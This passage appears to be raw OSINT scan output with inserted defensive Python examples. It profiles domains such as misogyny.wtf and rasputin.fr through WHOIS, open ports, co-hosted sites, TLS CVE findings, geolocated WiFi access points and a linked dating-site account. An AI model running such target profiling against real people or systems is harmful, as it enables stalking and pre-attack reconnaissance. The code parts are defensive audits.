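    label, sep, rest = host.partition(".")
    return bool(label) and sep == "." and "." + rest == pattern[1:]


def covers(cert: dict, host: str) -> bool:
    # Only the SAN list counts; clients no longer fall back to the CN.
    return any(hostname_matches(host, san) for san in cert["sans"])


def is_valid_on(cert: dict, day: str) -> bool:
    when = datetime.strptime(day, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    return cert["not_before"] <= when <= cert["not_after"]


def coverage_report(text: str = CERT_TEXT, hosts=SCAN_HOSTS) -> dict:
    cert = parse_cert_text(text)
    return {h: covers(cert, h) for h in hosts}


if __name__ == "__main__":
    cert = parse_cert_text(CERT_TEXT)
    print(cert["subject_cn"], "issued by", cert["issuer_cn"], "SANs:", cert["sans"])
    for host, ok in coverage_report().items():
        print(f"{host:30} covered={ok}")
```

A certificate that covers none of the names you were scanning should be discarded from co-hosting inference; the useful follow-up is to reconnect with SNI set to each candidate hostname and compare the certificates that come back.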
The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: AMENWORLD.COM Registry Domain ID: 15262498_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.networksolutions.com Registrar URL: http://networksolutions.com Updated Date: 2022-11-26T05:03:33Z Creation Date: 1999-12-14T23:19:10Z Registrar Registration Expiration Date: 2024-12-14T23:19:10Z Registrar: Network Solutions, LLC Registrar IANA ID: 2 Reseller: Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Statutory Masking Enabled Registrant Name: Statutory Masking Enabled Registrant Organization: Statutory Masking Enabled Registrant Street: Statutory Masking Enabled Registrant City: Statutory Masking Enabled Registrant State/Province: FR Registrant Postal Code: Statutory Masking Enabled Registrant Country: FR Registrant Phone: Statutory Masking Enabled Registrant Phone Ext: Statutory Masking Enabled Registrant Fax: Statutory Masking Enabled Registrant Fax Ext: Statutory Masking Enabled Registrant Email: abuse@web.com Registry Admin ID: Statutory Masking Enabled Admin Name: Statutory Masking Enabled Admin Organization: Statutory Masking Enabled Admin Street: Statutory Masking Enabled Admin City: Statutory Masking Enabled Admin State/Province: Statutory Masking Enabled Admin Postal Code: Statutory Masking Enabled Admin Country: Statutory Masking Enabled Admin Phone: Statutory Masking Enabled Admin Phone Ext: Statutory Masking Enabled Admin Fax: Statutory Masking Enabled Admin Fax Ext: Statutory Masking Enabled Admin Email: abuse@web.com Registry Tech ID: Statutory Masking Enabled Tech Name: Statutory Masking Enabled Tech Organization: Statutory Masking Enabled Tech Street: Statutory Masking Enabled Tech City: Statutory Masking Enabled Tech State/Province: Statutory Masking Enabled Tech Postal Code: Statutory Masking Enabled Tech Country: Statutory Masking Enabled Tech Phone: Statutory Masking Enabled Tech Phone Ext: Statutory 
Masking Enabled Tech Fax: Statutory Masking Enabled Tech Fax Ext: Statutory Masking Enabled Tech Email: abuse@web.com Registry Billing ID: Statutory Masking Enabled Billing Name: Statutory Masking Enabled Billing Organization: Statutory Masking Enabled Billing Street: Statutory Masking Enabled Billing City: Statutory Masking Enabled Billing State/Province: Statutory Masking Enabled Billing Postal Code: Statutory Masking Enabled Billing Country: Statutory Masking Enabled Billing Phone: Statutory Masking Enabled Billing Phone Ext: Statutory Masking Enabled Billing Fax: Statutory Masking Enabled Billing Fax Ext: Statutory Masking Enabled Billing Email: abuse@web.com Name Server: PARIS.AMEN.FR Name Server: NS2.AMEN.FR DNSSEC: unsigned Registrar Abuse Contact Email: domain.operations@web.com Registrar Abuse Contact Phone: +1.8777228662 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:04Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en The data in Networksolutions.com's WHOIS database is provided to you by Networksolutions.com for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. Networksolutions.com makes this information available "as is," and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; or (2) enable high volume, automated, electronic processes that apply to Networksolutions.com (or its systems). 
The compilation, repackaging, dissemination or other use of this data is expressly prohibited without the prior written consent of Networksolutions.com. Networksolutions.com reserves the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. 2022-12-18 00:24:57 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.184 90.116.149.183 2022-12-18 00:09:51 Co-Hosted Site No HackerTarget 0 0 2 0 None bestlifeindividualsupportservices.com 172.67.147.230 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77afa2517c969279-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:25:16 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [104.21.27.242] https://www.virustotal.com/en/ip-address/104.21.27.242/information/ 104.21.27.242 2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:8443 188.114.97.0/24 2022-12-18 00:27:23 Malicious IP Address Yes MetaDefender 0 0 2 0 None webroot.com [188.114.97.9] 188.114.97.9 2022-12-18 00:09:42 Co-Hosted Site No HackerTarget 0 0 2 0 None ahedeyay.work 172.67.147.230 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: 
cloudflare CF-RAY: 77b1ee0fdd422c1d-ORD Content-Encoding: gzip 104.21.28.240 2022-12-18 00:13:04 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.3 2022-12-18 00:06:31 Company Name No Company Name Extractor 4 0 2 0 None Identity Digital Inc. Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. 
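The two testssl.sh rows on this page are cipher-suite findings: Sweet32 (CVE-2016-2183, recorded as Medium) applies whenever a 64-bit block cipher such as 3DES can be negotiated, because the birthday bound on 64-bit blocks is reached after about four billion blocks of one session; Lucky Thirteen (CVE-2013-0169, recorded as Low, score 2.6) is a timing weakness of CBC-mode suites in TLS 1.2 and earlier whose exploitability depends on the server's TLS stack. The page does not list which suites the scanned hosts offered. The following is an added example, not testssl.sh code: an offline audit of a constructed cipher-suite list against those two findings, plus the birthday-bound arithmetic behind the Sweet32 description.

```python
"""Offline cipher-suite audit for Sweet32 (CVE-2016-2183) and Lucky Thirteen (CVE-2013-0169),
with the birthday-bound arithmetic Sweet32 rests on. The suite list is constructed."""
import math
import re

# Pattern -> finding tag. Suite names are the IANA TLS_* forms.
_CHECKS = [
    (re.compile(r"EXPORT|_NULL_|_anon_"), "export-null-anon"),
    (re.compile(r"_(?:3DES|DES|IDEA|RC2)_"), "sweet32"),       # 64-bit block ciphers
    (re.compile(r"_RC4_"), "rc4"),
    (re.compile(r"_CBC_"), "cbc-lucky13"),                      # MAC-then-encrypt CBC, TLS <= 1.2
    (re.compile(r"^TLS_(?:RSA|DH_RSA|DH_DSS|ECDH_RSA|ECDH_ECDSA)_WITH_"), "no-pfs"),
]


def audit_suite(name: str) -> list:
    return [tag for pattern, tag in _CHECKS if pattern.search(name)]


def audit(suites) -> dict:
    return {s: audit_suite(s) for s in suites}


def acceptable(suites) -> list:
    return [s for s in suites if not audit_suite(s)]


def collision_probability(blocks: int, block_bits: int = 64) -> float:
    """Birthday bound: P(some two ciphertext blocks collide) ~= 1 - exp(-n^2 / 2^(b+1)).
    expm1 keeps precision when the probability is tiny (128-bit blocks)."""
    return -math.expm1(-(blocks ** 2) / 2 ** (block_bits + 1))


def bytes_until_probability(p: float, block_bits: int = 64) -> float:
    """Ciphertext volume within one session at which the collision probability reaches p."""
    blocks = math.sqrt(-(2 ** (block_bits + 1)) * math.log1p(-p))
    return blocks * (block_bits // 8)


# Constructed list of offered suites; the page does not record the real one.
SAMPLE_OFFERED = [
    "TLS_AES_256_GCM_SHA384",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384",
    "TLS_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_RSA_WITH_RC4_128_SHA",
]

if __name__ == "__main__":
    for suite, findings in audit(SAMPLE_OFFERED).items():
        print(f"{suite:45} {findings or 'ok'}")
    gib = bytes_until_probability(0.5) / 2 ** 30
    print(f"3DES: 50% collision chance after ~{gib:.0f} GiB in one session; "
          f"p at 2^32 blocks = {collision_probability(2 ** 32):.3f}")
```

The `cbc-lucky13` tag is a policy flag, not proof that a given server is exploitable: it marks the suites where the attack applies, and whether a particular stack leaks the timing is a patch-level question. The `sweet32` tag is different in kind, since any negotiable 64-bit block cipher is enough; the fix is to stop offering 3DES rather than to patch. The arithmetic shows why 128-bit blocks are not a practical concern: at the same 2^32 blocks the collision probability is on the order of 10^-20.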
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:8080 188.114.96.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pancakes (Net ID: 00:00:48:67:6D:D1) 37.7803446,-122.3906132 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.183 34.149.204.188 2022-12-18 00:13:47 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@sonexo.nl %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
%% domain: rasputin.fr status: ACTIVE eppstatus: active hold: NO holder-c: DA10525-FRNIC admin-c: DA10525-FRNIC tech-c: DA10525-FRNIC registrar: SONEXO B.V Expiry Date: 2023-08-06T23:33:00Z created: 2018-08-06T23:33:00Z last-update: 2022-08-06T23:35:46Z source: FRNIC nserver: ns1.sonexo.eu nserver: ns2.sonexo.com source: FRNIC key1-tag: 581 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 4941121364626216209F295028F9A30785FE7E5C365AF39EB6A093CD2AF41311 source: FRNIC registrar: SONEXO B.V address: Edeseweg 52 - address: 6721 JX Bennekom country: NL phone: +31.308200291 fax-no: +31.302711470 e-mail: info@sonexo.nl website: http://www.sonexo.nl anonymous: No registered: 2014-04-21T00:00:00Z source: FRNIC nic-hdl: DA10525-FRNIC type: ORGANIZATION contact: NetTalk address: NetTalk address: Postbus 447 address: 6710BK Ede country: NL phone: +31.850160612 fax-no: +31.850160613 e-mail: info@nettalk.nl registrar: SONEXO B.V changed: 2017-02-25T15:15:13Z anonymous: NO obsoleted: NO eppstatus: serverUpdateProhibited eppstatus: associated eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.072571Z <<< 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.181 34.149.204.188 2022-12-18 00:09:53 Malicious IP on Same Subnet Yes abuse.ch 0 0 3 0 None abuse.ch Feodo Tracker (IP) [90.116.0.0/16] https://feodotracker.abuse.ch/downloads/ipblocklist.txt 90.116.0.0/16 2022-12-18 00:39:26 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.6] https://www.virustotal.com/en/ip-address/188.114.96.6/information/ 188.114.96.0/24 2022-12-18 00:18:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.11:443 188.114.97.0/24 2022-12-18 00:25:10 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 81.88.58.201 81.88.58.196 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None FriendFinder-X (Category: dating) 
https://www.friendfinder-x.com/profile/rasputain rasputain 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None php-web-server-1.0635412.repl.co 34.149.204.188 2022-12-18 00:08:24 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.1 2022-12-18 00:22:07 Open TCP Port No Censys 0 1 2 0 None 34.149.204.188:9000 34.149.204.188 2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:443 188.114.96.0 2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.100 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:03:B5:60) 37.780462,-122.390564 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0412988a19b82-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinepichinchabankingecuinfor--ecuador1.repl.co 34.149.204.188 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:443 188.114.96.0/24 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 192.204.149.34.bc.googleusercontent.com 34.149.204.192 2022-12-18 00:03:11 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature 
Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:69:96:28:2e:8d:11:23:d2:df:8d:af:0e:86:91: 07:54:3a:ad:81:0f:6e:0c:ed:ba:58:9b:a8:dd:0b:f6:9f:5b: b8:d1:0d:0f:20:8d:96:07:bf:17:bf:40:1d:05:de:64:02:31: 00:b6:70:a5:8a:80:f9:65:63:f5:4e:8a:9f:00:55:5b:1c:61: af:79:57:92:51:0e:76:a7:d1:43:e6:9b:64:5c:22:3d:99:f7: f9:9b:ac:52:3e:73:11:67:61:8b:92:50:c7 2022-12-18 00:09:40 Co-Hosted Site No HackerTarget 0 0 2 0 None a-prime-sp-health.fyi 172.67.147.230 2022-12-18 00:06:15 HTTP Status Code No Web Spider 0 0 1 0 None 200 misogyny.wtf 2022-12-18 00:03:04 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.108 90.116.166.104 2022-12-18 00:25:57 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.org plague.fun 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 
0 None (Net ID: 00:02:2D:00:21:01) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None default (Net ID: 00:01:24:F2:E2:35) 37.7803446,-122.3906132 2022-12-18 00:03:11 Affiliate - Internet Name No DNS Resolver 1 0 2 0 None lhcp3232.webapps.net 81.88.52.232 2022-12-18 00:21:58 Netblock IPv6 Membership No Censys 0 0 2 0 None 2a06:98c1:3120::/48 2a06:98c1:3120::1 2022-12-18 00:13:34 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'suspicious', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2020-12-17 02:56:49', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.147.230', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'source': u'Hybrid-Analysis', u'first_seen': u'2021-10-31 19:15:15', u'description': u'Malware', u'last_seen': u'2021-10-31 19:15:23'}, {u'count': 1, u'description': u'BBVA Bancomer phishing', u'source': u'Antiphishing.com.ar', u'first_seen': u'2020-12-17 02:56:49', u'ref': [279], u'last_seen': u'2020-12-17 02:56:49'}], u'modification_time': u'2021-10-31 19:15:23', u'asn_cidr': u'172.67.144.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, 
u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ad04409be52d85-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:8443 188.114.96.0/24 2022-12-18 00:17:00 Web Content No Web Spider 1 0 4 0 None /*! * Bootstrap v3.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 Twitter, Inc. * Licensed under the MIT license */ if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3this.$items.length-1||t<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){e.to(t)}):i==t?this.pause().cycle():this.slide(i"]} 20.226.83.185 2022-12-18 00:16:53 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. 
